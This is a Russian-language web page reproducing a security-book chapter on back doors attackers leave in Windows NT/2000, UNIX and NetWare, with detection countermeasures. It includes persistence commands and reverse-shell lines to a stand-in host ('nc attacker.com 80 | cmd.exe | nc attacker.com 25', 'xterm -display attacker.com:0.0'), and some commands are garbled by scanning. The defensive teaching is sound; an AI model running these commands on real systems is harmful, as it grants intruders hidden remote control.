Бесплатный электронный учебник по защите информации компьютера в интернет |
|
служба Компьютерная
помощь |
Потайные ходы |
Антивирусная защита компьютера. Вызов мастера на дом в Кириши |
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
Потайные ходы Если непрошеные гости обоснуются в системе, избавиться
от них бывает трудно. Даже если брешь, которой они воспользовались,
будет найдена и закрыта, злоумышленники могут обеспечить специальный
механизм и быстро получить доступ в любое время. Такой механизм называется
потайным ходом (back door). |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Создание фиктивных учетных записей Почти каждому системному администратору известно,
что учетные записи с правами суперпользователя — это такие ресурсы,
которые легко защищать и контролировать. А вот учетные записи, равные
по привилегиям суперпользователю, но имеющие неприметные имена, отследить
намного труднее. Злоумышленник обязательно попытается создать такие
учетные записи. NT/2000 В Windows NT/2000 привилегированные локальные учетные
записи легко создать с помощью следующих команд. net user <имя_пользователя><пароль>/ADD Вывести список всех членов основных административных групп так же легко, как и добавить в них новую учетную запись. Как показано в следующем примере, в котором на экран выводится список членов группы Windows 2000 Enterprise Admins (администраторы предприятия), это можно сделать с помощью команды net [local] group. C:\>net group "Enterprise Admins" UNIX В системе UNIX фиктивные учетные записи создаются
и идентифицируются аналогичным образом. Как правило создаются безобидные
учетные записи с нулевыми значениями идентификаторов UID и GID. Следует
проверить также учетные записи с таким же идентификатором GID, что
и у пользователя root, а затем проверить совпадение свойств групп
в файле /etc/groups. Кроме того, такие учетные записи легко выявить
по содержимому файла /etc/passwd. Novell В системе NetWare типичным является создание "осиротевших"
объектов, т.е. создание, например, контейнера с одним пользователем,
а затем передача этому новому пользователю прав опекунства над родительским
контейнером. Если взломщик имеет возможность постоянно регистрироваться
в дереве NDS, то эту ситуацию не сможет исправить даже администратор.
Более подробную информацию о "потайных ходах" системы NetWare
можно найти в главе 7. Загрузочные файлы В предыдущих главах много говорилось о "потайных
ходах", которые создаются с помощью механизмов загрузки, поддерживаемых
различными платформами. Такой способ стал излюбленным методом злоумышленников,
поскольку он позволяет устанавливать ловушки, которые активизируются
при каждом перезапуске системы неосмотрительными пользователями. NT/2000 В операционной системе Windows NT в первую очередь
нужно проверить различные папки, находящиеся в папке Startup: %systemroot%\profiles\%username%\
start menu\programs\startup (папка All Users будет использоваться
независимо от того, кто из пользователей зарегистрировался интерактивно).
Кроме того, для запуска программ типа "троянский конь" или
для установки "потайного хода" при каждом запуске системы
взломщики могут воспользоваться параметрами системного реестра. Нужно
проверить следующие параметры
Из предыдущих глав вы узнали, как можно создать "потайной ход" в системе NT с помощью драйверов устройств, загружающихся во время запуска системы. Драйвер пакета Invisible Keylogger Stealth (IKS) (iks.sys, конечно же, переименованный более подходящим образом) может быть скопирован в каталог %systemroot%\system32\ drivers. При этом программа будет запускаться вместе с ядром NT, благодаря чему на консоли пользователя этот процесс обычно остается невидимым. Программа также записывает несколько значений в системный реестр в HKLM\SYSTEM\Current-ControlSet\Services\iks (опять же, параметр iks может быть переименован взломщиком так же, как и сам файл драйвера). Если заранее сделать надежную резервную копию системного реестра (используя утилиту DumpReg компании Somarsoft), то можно легко выявить "следы присутствия" IKS. Просмотрев с помощью проводника Windows свойства драйвера IKS, можно также установить его происхождение. Использование броузера Web для загрузки кода Появление в мае 2000 года сценария ILOVEYOU, написанного
на языке Visual Basic, послужило свидетельством того, что есть
и другие способы запуска исполняемого кода: это установка начальной
страницы, загружаемой при запуске Web-броузера. http://www.skynet.net/-[переменная]/
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX Контрмера: не запускайте исполняемые файлы, найденные в Internet! Должно быть понятно и без слов (хотя на протяжении
многих лет это повторяется много раз): нужно быть предельно осторожным
по отношению к исполняемым файлам, загружаемым из Internet. Запуск
файлов с удаленного сервера — это путь, ведущий прямо к катастрофе.
Вместо этого лучше загрузить их на свой компьютер локально, проверить
на наличие вирусов, по возможности проанализировать содержимое (например,
файлов сценариев или командных файлов), а затем протестировать их
на какой-нибудь второстепенной системе. UNIX В системе UNIX взломщики часто помещают программы,
предназначенные для создания "потайного хода", в файлы rc.d.
Следует проверить каждый из таких файлов и убедиться, что в них не
содержится ни одной незнакомой программы или такой, которая была бы
недавно добавлена. Для внедрения ловушек может быть использован также
файл inetd.conf. В этом файле находятся параметры демона inetd, суперсервера
Internet системы UNIX, который при необходимости динамически запускает
различные процессы, такие как FTP, telnet, finger и т.д. В этом файле
также можно обнаружить подозрительные демоны. Novell Файлы startup.ncf и autexec.ncf системы NetWare позволяют
определить, какие программы, параметры и загружаемые модули системы
NetWare (NLM — NetWare Loadable Module) будут запущены при загрузке
сервера. Взломщики могут отредактировать один или несколько файлов
. NCF, которые вызываются из этих загрузочных файлов (например, файл
Idremote.ncf) и, таким образом, создать "потайной ход",
например запустить хакерскую программу rconsole. Поэтому периодически
проверяйте каждый загрузочный файл, чтобы не упустить момент создания
взломщиками "потайного хода". Запланированные задания Например, в системе Windows NT простой "потайной
ход" можно реализовать, установив утилиту netcat, которая будет
ежедневно запускаться в назначенное время. C:\>at\\192.168.202/44 12:ООА /every:! В системе UNIX планирование выполнения процессов осуществляется с использованием программы crontab. Она часто применяется для автоматизации трудоемкого процесса поддержки системы, но может быть использована также и для создания "потайных ходов". В большинстве систем UNIX файл crontab можно редактировать с помощью команды crontab -e, при этом данный файл будет открыт в определенном редакторе (который обычно задается с помощью переменных окружения VISUAL или EDITOR). Чаще всего "потайной ход" можно создать в системе, в которой программа crontab запускается с правами суперпользователя и используется для вызова командных файлов. Если для этих командных файлов взломщик задаст права доступа, позволяющие редактировать их посторонним пользователям, то он сможет легко вернуться в систему в качестве обычного пользователя и сразу же получить привилегии root. В файле crontab это можно осуществить с помощью следующих команд. ср /bin/csh /tmp/evilsh Контрмеры: защита от запланированных заданий Для того чтобы предотвратить эту атаку в системе
NT, с использованием команды at проверьте список заданий на предмет
наличия в нем несанкционированных заданий. С:\> at C:\>at \\172.29.11.214 0 /delete Альтернативный способ заключается в завершении работы службы с помощью команды net stop schedule, а затем запрещении ее запуска с помощью команды Control Panel>Services. В системе UNIX представляющие опасность команды можно поискать в файлах crontab. Кроме того, проверьте права доступа, связанные с используемыми файлами и сценариями. Удаленное управление Вполне возможна ситуация, когда взломщик не сможет
вернуться на целевой компьютер, даже обладая необходимыми регистрационными
данными. Это может произойти, если некоторые служебные процессы сервера
не выводят приглашения на регистрацию. Например, мало пользы от пароля
root, если на взламываемом сервере отключены г-службы или telnet.
Точно так же в системе Windows NT администратор по умолчанию получает
очень ограниченные возможности удаленного управления. Поэтому первоочередная
цель взломщика состоит в обеспечении механизмов повторного доступа.
netcat В этой книге ранее уже упоминался "швейцарский
армейский нож", утилита netcat (ее версии как для системы NT,
так и для UNIX можно найти по адресу http.//www. 10pht.com/~weld/netcat/index.html).
С помощью этой программы можно незаметно прослушивать нужный порт,
выполняя заранее определенные действия после установки удаленного
соединения с системой. Утилита netcat окажется чрезвычайно мощным
средством удаленного управления, если эти действия будут направлены
на запуск командной оболочки. Затем злоумышленники могут подключиться
с помощью netcat к заданному порту и получить в свое распоряжение
командную оболочку. Команды запуска netcat в режиме прослушивания
обычно скрытно помещаются в какой-нибудь загрузочный файл (см. предыдущий
раздел), поэтому эта программа прослушивания портов будет активизироваться
при каждой перезагрузке системы. Пример такого "потайного хода"
показан на рис. 14.2, на котором виден параметр системного реестра
Windows NT, приводящий к запуску утилиты netcat в процессе загрузки
системы. Сообразительные взломщики обязательно замаскируют своего "троянского коня" netcat. Для этого можно дать программе какое-нибудь нейтральное имя, например ddedll32.exe, или такое, что администратор дважды подумает, прежде чем удалит такой файл. Параметр -L утилиты netcat дает возможность возобновить работу при многократном нарушении связи; при использовании ~d программа netcat запускается в скрытом режиме (без интерактивной консоли); а -е позволяет задать запускаемую программу, в данном случае командный интерпретатор NT cmd.exe. Параметр -р определяет прослушиваемый порт (в данном примере 8080). Версию программы netcat для системы UNIX можно легко настроить так. чтобы запускалась командная оболочка /bin/sh, что приведет к тому же результату. После этого взломщику останется только соединиться с портом, который прослушивается утилитой netcat, и получить в свое распоряжение удаленную командную оболочку.
remote.exe (NT) Утилиту remote из набора NTRK можно запустить в качестве
сервера, чтобы командная строка возвращалась любому аутентифииированному
пользователю NT, который подключился с помощью соответствующего удаленного
клиента. Эту программу очень просто установить (нужно просто скопировать
файл remote.exe в системный каталог, например %systemroot%). Поэтому
зачастую ее использование предшествует последующей установке более
опасных программ, таких как графические утилиты удаленного управления
или программы-регистраторы нажатия клавиш. Более подробно утилита
remote.exe описана в главе 5. loki Программы loki и lokid, кратко рассмотренные в главе
11. предоставляют взломщикам простой механизм повторного получения
доступа к взломанной системе, даже если она расположена позади брандмауэра.
Оригинальность этих программ заключается в том, что клиент (loki)
помещает команды взломщика (в основном это пакеты IP) в заголовки
ICMP или UDP и отсылает их серверу (lokid), который выполняет их и
возвращает результаты. Поскольку многие брандмауэры допускают прохождение
на сервер пакетов ICMP и UDP, то инициированный взломщиком трафик
зачастую без проблем проходит через брандмауэр. Сервер lokid запускается
с помощью следующей команды. Back Orifice и NetBus Хотя оба этих средства по своей природе являются
графическими (NetBus даже предоставляет некоторые возможности по управлению
рабочим столом), они главным образом удаленно вызывают функции программного
интерфейса API. Так что лучше их расценивать их как инструменты создания
"потайных ходов", предназначенные для выполнения удаленных
команд, а не как графические утилиты удаленного управления. Возможности
каждой из этих утилит описаны в главах 4 и 5. Здесь же мы лишь еще
раз перечислим те места, в которых взломщики могут скрытно размещать
эти средства, чтобы администраторам было легче их разыскать. Контрмеры: защита против Back Orifice (и других программ) Попытки использования Back Orifice (а также служб FTP, telnet, SMTP, HTTP и т.д.) легко обнаружить, используя бесплатную утилиту фирмы Network Flight Recorder, которая называется BackOfficer Friendly (http://www.nfr.net/products/bof/). Эта программа с графическим интерфейсом работает в режиме прослушивания портов и сообщает обо всех попытках соединения с системой. Ее самой замечательной особенностью является режим Fake Replies (ложные ответы). При его использовании программа будет отвечать на telnet-запросы и записывать имена и пароли, с помощью которых взломщики пытаются получить доступ. Как видно из следующего рисунка, программа выполняет большую работу по отслеживанию попыток проникновения в систему.
Если известен пароль, то программу ВО2К можно легко
удалить на удаленном компьютере. Для этого с помощью клиентского приложения
нужно соединиться с сервером, в диалоговом окне раскрыть папку Server
Control и выбрать команду Shutdown Server с параметром DELETE. Перенаправление портов: реверсивный ceaнc telnet, netcat, datapipe, rinetd и fpipe В предыдущих разделах некоторые команды удаленного
управления, основанные на использовании командного процессора, описывались
в контексте прямых соединений. Теперь рассмотрим ситуацию, когда прямому
вмешательству в систему что-то препятствует, например прямой доступ
блокируется брандмауэром. Изобретательные взломщики могут обойти эти
препятствия с помощью перенаправления портов (port redirection). Реверсивный сеанс telnet Один из любимых взломщиками "потайных ходов"
во взломанную систему может быть реализован с помощью демона telnet,
входящего в комплект поставки многих версий UNIX. Так что эту программу
даже не потребуется загружать. Мы называем этот способ реверсивный
сеанс telnet, потому что в процессе его реализации утилита telnet
используется для соединения с находящейся в режиме прослушивания утилитой
netcat, запущенной на компьютере взломщика. Затем требуемые команды
направляются на целевой узел, а результаты их выполнения — обратно.
С:\> nc -w -1 -р 80 sleep 10000 | telnet 172.29.11.191 80 | Порты из предыдущего примера (80 и 25) используются стандартными службами (HTTP и SMTP соответственно). Поэтому обычно следующий через них поток сообщений свободно проходит через брандмауэр на многие внутренние узлы. Захват командной оболочки с помощью утилиты netcat Если на целевой компьютер можно поместить утилиту
netcat, или если она там уже установлена, то можно воспользоваться
аналогичным методом. Такой подход мы называем "захват командной
оболочки", потому что его суть заключается в том, что на своем
рабочем компьютере взломщик получает в полное распоряжение все функциональные
возможности удаленной командной оболочки. Рассмотрим пример, когда
в удаленной командной строке запускается следующая команда. nс attacker.com 80 | cmd.exe | nс attacker.com 25
datapipe Реализация перенаправления портов с помощью утилиты
netcat и ручная настройка этого процесса может оказаться довольно
хлопотным делом. В Internet можно найти несколько программ, которые
предназначены специально для этих целей. В системе UNIX очень популярна
утилита datapipe. С ее помощью взломщик может обеспечить перенаправление
данных так, чтобы пакеты принимались через порт 65000 и переадресовывались
в систему NT (порт 139). Далее, на своем компьютере злоумышленник
может настроить систему для выполнения прямо противоположных действий:
запустить утилиту datapipe для прослушивания порта 139 и перенаправления
сообщений на порт 65000 целевой системы. Например, для нападения на
систему NT (172. 29.11.100), расположенную позади брандмауэра, на
взломанном узле (172.29.11.2) нужно выполнить следующую команду. datapipe 65000 139 172.29.11.100 Затем на собственном компьютере взломщику необходимо запустить утилиту datapipe для прослушивания порта 139 и пересылки полученных данных на порт 65000 взломанного узла.datapipe 139 65000 172.29.11.2 Теперь через брандмауэр открыт доступ к системе NT (172.23.11. ICO). На рис. 14.4 показан пример реализации перенаправления портов и продемонстрирована эффективность этого метода. С помощью такого подхода можно обойти брандмауэры с фильтрацией пакетов, пропускающие сообщения, предназначенные для портов с большими номерами.rinetd Утилита rinetd — это "сервер перенаправления
Internet", созданный Томасом Бутеллом (Thomas Boutell). Эта программа
перенаправляет соединения TCP с одного IP-адреса и порта на другой.
Таким образом, она. во многом похожа на программу datapipe. Программа
работает как на базе интерфейса Win32 (включая Windows 2000), так
и в системе Linux УТН..ПГ rinetd очень легко использовать: нужно просто
создать конфигурационный файл, в котором указывается правило перенаправления.
Этот файл имеет следующий формат адрес_привязки порт_прмвязки адрес_соединения порт_соединения Запустить программу можно с помощью команды rinetd -с <имя_конфигурационного_файла>. Так же как и datapipe, эта утилита может оказаться очень эффективной против неправильно настроенного брандмауэра.fpipe Утилита fpipe предназначена для передачи/перенаправления
данных с порта TCP. Ее разработали авторы этой книги, занимающие ключевые
позиции в компании Foundstone, Inc. Эта программа создает поток TCP.
исходящий из выбранного пользователем порта. Она прекрасно подходит
для перенаправления, представленного на рис. 14.4, и в системе Windows
может послужить равноценной заменой программы datapipe, применимой
только к UNIX.
Пользователи должны знать, что, если при задании порта-источника исходящего соединения был использован параметр -в и это соединение было закрыто, может оказаться невозможным установить его повторно (утилита fpipe сообщит, что адрес уже используется) до того момента, пока не истекут интервалы ожидания TIME_WAIT и CLOSE_WAIT, определяемые протоколом TCP. Эти интервалы ожидания могут варьироваться в диапазоне от 30 секунд до четырех минут и более, в зависимости от используемой версии операционной системы и ее версии. Эти интервалы ожидания определяются протоколом TCP и не являются ограничением самой утилиты fpipe. Причина возникновения такой ситуации заключается в том, что утилита fpipe пытается установить новое соединение с удаленным узлом с применением тех же комбинаций локальных IР-адреса/порта и удаленных IP-адреса/порта, что и в предыдущем сеансе. Новое же соединение не может быть установлено до тех пор, пока стеком протоколов TCP не будет решено, что предыдущее соединение не было полностью завершено. VNC Рассмотренные ранее средства удаленного управления
предоставляют возможность практически полного контроля над системой.
Поэтому при одной только мысли о возможности получения в свои руки
виртуального рабочего стола целевой системы у взломщиков учащается
сердцебиение. Программа Virtual Network Computing (VNC) предоставляет
именно такие возможности. Кроме того, этот программный продукт легко
установить на "захваченной" системе и использовать ее как
"потайной ход", обеспечивающий получение доступа впоследствии.
Взлом X Windows и других графических терминальных служб На узлах UNIX, на которых не ограничивается исходящий
трафик приложения xtenn (TCP 6000). можно модифицировать некоторые
из приведенных ранее методов перенаправления портов, чтобы "захватить"
окно терминала и перенаправить таким образом оконную командную оболочку
обратно на компьютер взломщика. Для этого достаточно запустить Х-сервер,
а затем ввести следующую команду. xterrn -display attacker.соm:0.О& С системой Windows придется повозиться немного больше. Не остается ничего другого, как воспользоваться такими продуктами, как Windows Terminal Server или Independent Computing Architecture (ICA) компании Citrix (http://www.citrix.com). С помощью этих компонентов можно организовать конвейер, связывающий удаленный рабочий стол с компьютером взломщика. В отличие от системы NT4, в Windows 2000 терминальный сервер является встроенным компонентом, который входит в комплект поставки. Так что почти наверняка он окажется доступным. Чтобы определить, установлены ли на взломанном удаленном узле терминальные службы, можно воспользоваться утилитой sclist из набора NTRK. После этого с помощью привилегированной учетной записи нужно установить соединение. Ниже показан пример использования утилиты sciist (для краткости полученный листинг сокращен). D:\Toclbox>sclist athena Общие контрмеры против "потайных ходов": профилактический осмотр Вы познакомились с многочисленными средствами и методами,
к которым прибегают взломщики для создания "потайных ходов".
Как же администратор может обнаружить и нейтрализовать оставленные
взломщиками следы? Средства автоматизации Как говорится, легче предотвратить, чем обезвредить.
Многие современные коммерческие антивирусные программные продукты
неплохо работают, автоматически сканируя систему в поисках таких программ.
Зачастую они нейтрализуют опасность еще до того, как будет причинен
реальный вред (например, до получения доступа к дисководу для гибких
дисков или до загрузки вложения электронного сообщения). Достаточно
полный перечень производителей антивирусных программ можно найти в
статье Q49500 базы знаний компании Microsoft по адресу http://support.microsoft.com/support/
kb/articles/Q49/5/00.ASP. Ведение учета Предположим, что все принятые меры предосторожности
не помогли и система все же оказалась взломанной. В такой ситуации
единственным оружием против почти всех описанных ранее приемов создания
"потайных ходов" является бдительность. Со стороны администратора
было бы разумным вести всесторонний учет состояния системы и продумать,
где можно быстро разместить надежные данные для восстановления системы.
Мы настоятельно рекомендуем выполнять инвентаризацию наиболее важных
систем, регистрируя данные как о начальной установке, так и о каждом
их обновлении. Кто прослушивает порты Возможно, это очевидно, но никогда не стоит недооценивать
мощь утилиты netstat. которая позволяет выявить факт прослушивания
портов программами, которые аналогичны рассмотренным выше. Следующий
пример демонстрирует полезность этого инструмента (для краткости приводится
не весь листинг). D:\Toolbox>netstat-an Единственный недостаток программы netstat заключается в том, что она не сообщает о процессе, который прослушивает тот или иной порт. В системах Windows NT и 2000 с этой же задачей прекрасно справляется программа fport компании Foundstone, Inc. D:\Toolbox>fport Для сканирования больших сетей и поиска программ прослушивания лучше всего использовать программы-сканеры портов или сетевые средства, которые обсуждались в главе 2. Какой бы метод обнаружения прослушиваемых портов не использовался, его результат будет довольно трудно интерпретировать, если вы не знаете, что именно нужно найти. В табл. 14.1 приведен перечень наиболее красноречивых признаков наличия программного обеспечения удаленного управления. Если на каком-либо узле обнаружено прослушивание приведенных в таблице портов, то это верный признак того, что он подвергся нападению либо по злому умыслу хакера либо из-за неосторожности самого администратора. Следует проявлять бдительность также и по отношению к другим портам, которые на первый взгляд кажутся обычными. Во многих из перечисленных средств можно изменять номер прослушиваемого порта (см. таблицу). Чтобы убедиться, что доступ к этим портам из Internet ограничен, нужно использовать устройства обеспечения безопасности на границе сети. Удаление подозрительных процессов Еще одна возможность выявления "потайного хода"
заключается в проверке списка процессов на наличие в нем таких исполняемых
файлов, как nc, WinVNC. exe и т.д. Для этого в системе NT можно использовать
утилиту pulist из набора NTRK, которая выводит все запущенные процессы,
или sclist, показывающую работающие службы. Таблица 14.1. Номера портов, используемые программами и удаленного управления при создании "потайных ходов"
Команды pulist и sclist просты в использовании. Их
удобно применять в файлах сценариев для автоматизации процесса тестирования
как на локальной системе, так и в сети. В качестве примера приведем
список процессов, выводимый программой pulist. С:\nt\ew>pulist C:\nt\ew>sclist \\172.29.11.191 [crush] lsof -i Отслеживание изменений файловой системы Для перегруженных работой администраторов сама мысль
о регулярном обновлении полного списка файлов и каталогов может показаться
безумной, поскольку это требует намного больших затрат, чем все предыдущие
рекомендации. В то же время, если состояние системы изменяется не
очень часто, такой учет является самым надежным методом выявления
следов злоумышленников. D:\Toolbox>md5sum d:\test.txt>d:\test.md5 Следует упомянуть и несколько других важных утилит, предназначенных для проверки содержимого двоичных файлов. К ним относится известная программа strings, которая работает как в системе UNIX, так и в Windows, BinText Робина Кайра (Robin Keir) для Windowsи UltraEdit32 для Windows . И наконец, при инвентаризации файловой системы очевидным шагом является поиск легко узнаваемых исполняемых файлов, обеспечивающих "потайной ход", а также используемых ими библиотек. Поскольку большинство из этих инструментов может быть переименовано, такая процедура обычно не приносит пользы, но устранение очевидных изъянов — это уже половина успеха в битве за обеспечение безопасности сети. В табл. 14.2 приведен список наиболее важных файлов, при обнаружении которых нужно принимать меры, описанные в этой главе. Таблица 1 4.2. Используемые пo умолчанию имена исполняемых файлов утилит удаленногоуправления
Загрузочный файл и параметры системного реестра Взломщикам было бы неинтересно создавать "потайной
ход", если бы после обычной перезагрузки системы или после удаления
администратором какой-нибудь необходимой службы, они не имели бы возможности
возобновить соединение. Это можно обеспечить, поместив в основных
конфигурационных файлах или в системном реестре ссылки на средства
создания "потайного хода". Фактически для функционирования
многих из упомянутых программ требуется наличие в системном реестре
определенных параметров, что значительно облегчает их идентификацию
и удаление. Аудит, проверка учетных записей и ведение журналов регистрации Это последняя по порядку, но не по степени важности,
контрмера, поскольку невозможно идентифицировать вторжение, если не
активизированы средства оповещения. Убедитесь, что подключены встроенные
возможности аудита. Например, в NT политику аудита можно настроить
с помощью диспетчера пользователей, а в 2000 — с использованием аплета
Security Policy. To же самое можно осуществить с помощью утилиты auditpol
из набора NTRK. Файловая система NTFS позволяет отслеживать доступ
на уровне отдельных файлов. Для этого в окне проводника Windows щелкните
правой кнопкой мыши на требуемой папке или на файле, выберите команду
Properties, перейдите во вкладку Security, щелкните на кнопке Auditing
и настройте нужные параметры. Известно, что в системе NT4 ведение полного аудита приводит к снижению производительности, поэтому многие не пользовались этой возможностью. Однако тестирование Windows 2000 показало, что в этой операционной системе в режиме аудита потребление ресурсов значительно снижено и замедление ее работы неощутимо даже при использовании всех предоставляемых возможностей. Конечно, если журнал регистрации не просматривается регулярно, если его содержимое удаляется из-за недостатка свободного пространства на диске или из-за плохой организации, то даже самый полный аудит окажется бесполезным. Однажды мы посетили Web-узел, который был предупрежден об атаке еще за два месяца до ее реализации. И это случилось только благодаря тому, что некоторые системные администраторы старательно вели журналы регистрации. Чтобы не потерять такую важную информацию, разработайте политику регулярного архивирования журналов регистрации. Многие компании регулярно импортируют их в базы данных, чтобы облегчить процесс поиска и автоматизировать систему оповещения об опасности.Кроме того, внимательно следите за необъяснимыми изменениями учетных записей. Здесь могут пригодиться программы сторонних производителей, позволяющие получить "мгновенный снимок" системы. Например, программы DumpSec (ее предыдущая версия называется DumpACL), DumpReg и DumtEvt компании Somarsoft (http://www.-somarsoft.com) предоставляют практически всю нужную информацию о системах NT/2000. Запуск этих утилит выполняется из командной строки |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|||
|